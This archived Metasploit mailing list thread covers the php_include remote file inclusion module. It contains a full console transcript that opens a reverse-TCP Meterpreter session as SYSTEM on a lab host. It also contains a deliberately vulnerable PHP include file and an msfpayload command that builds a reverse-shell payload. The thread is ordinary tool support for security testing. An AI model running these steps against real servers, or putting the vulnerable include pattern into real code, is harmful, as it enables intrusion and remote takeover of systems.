Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: php_include confusion

From: egypt () metasploit com
Date: Mon, 12 Jul 2010 18:01:33 -0600
PHP is no longer configured to be vulnerable to this class of exploits
by default.  If you want to play with it, you'll need to set
allow_url_include to true in your php.ini.

XXpathXX gets replaced with the URL of the payload.  There are several
ways you could have discovered this yourself.  The easiest way is to
modify the exploit to print out the request before sending it.
Alternatively, you could run a sniffer or just read the code, which
may be a good idea anyway since you appear to have some misconceptions
about what this exploit does.  You don't need to generate the payload
and you don't need to host it anywhere else; everything needed to run
arbitrary code is contained in the exploit.

The following is a transcript of the exploit working as expected:

msf exploit(php_include) > show options

Module options:

   Name      Current Setting               Required  Description
   ----      ---------------               --------  -----------
   PATH      /                             yes       The base
directory to prepend to the URL to try
   PHPRFIDB                                no        A local file
containing a list of URLs to try, with XXpathXX replacing the URL
   PHPURI    /vuln/test.php?path=XXpathXX  no        The URI to
request, with the include parameter changed to XXpathXX
   Proxies                                 no        Use a proxy chain
   RHOST     192.168.99.129                yes       The target address
   RPORT     80                            yes       The target port
   SRVHOST   192.168.99.1                  yes       The local host to
listen on.
   SRVPORT   8080                          yes       The local port to
listen on.
   URIPATH   /foo                          no        The URI to use
for this exploit (default is random)
   VHOST                                   no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.99.1     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(php_include) > exploit

[*] Started reverse handler on 192.168.99.1:4444
[*] Using URL: http://192.168.99.1:8080/foo
[*] PHP include server started.
[*] Sending stage (33846 bytes) to 192.168.99.129
[*] Meterpreter session 4 opened (192.168.99.1:4444 ->
192.168.99.129:1415) at Mon Jul 12 17:55:48 -0600 2010

meterpreter > getuid
Server username: SYSTEM (0)
meterpreter >


Hope this helped,
egypt



On Mon, Jul 12, 2010 at 5:07 PM, Jeffs <jeffs () speakeasy net> wrote:

In metapsloit when using the /unix/webapp/php_include the attacker is asked
to include a value for PHPURI  such as
/slogin_lib.inc.php?slogin_path=XXpathXX

Regarding the XXpathXX value, am I correct to assume this passes through to
the metasploit engine to construct an obfuscated string that is then sent to
the vulnerable site, appended to the URL automatically?

All documentation and information on using this exploit suggests that if you
are not going to use the PHPRFIDB setting, to leave this as "XXpathXX".

However all my experimentation does not send a specific url to the
vulnerable site as is demonstrated in several videos on this subject.

I know my rhost and lhost are correct, along with all other settings.  The
apache server runs php and is accessible.  The metapsloit service just hangs
at:

[*] PHP include server started.


index_test.php looks like this:

<html>
<body>
<? require $_GET['include'] ?>
</body>
</html>


and include.php.txt was created properly with msfpayload as such.

./msfpayload php/reverse_php LHOST=192.168.1.101 R >
/var/www/include.php.txt

Both files on the are the web server in the proper directories.

If someone could clarify the XXpathXX value for me that would be greatly
appreciated.

Thanks much

jeffs
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: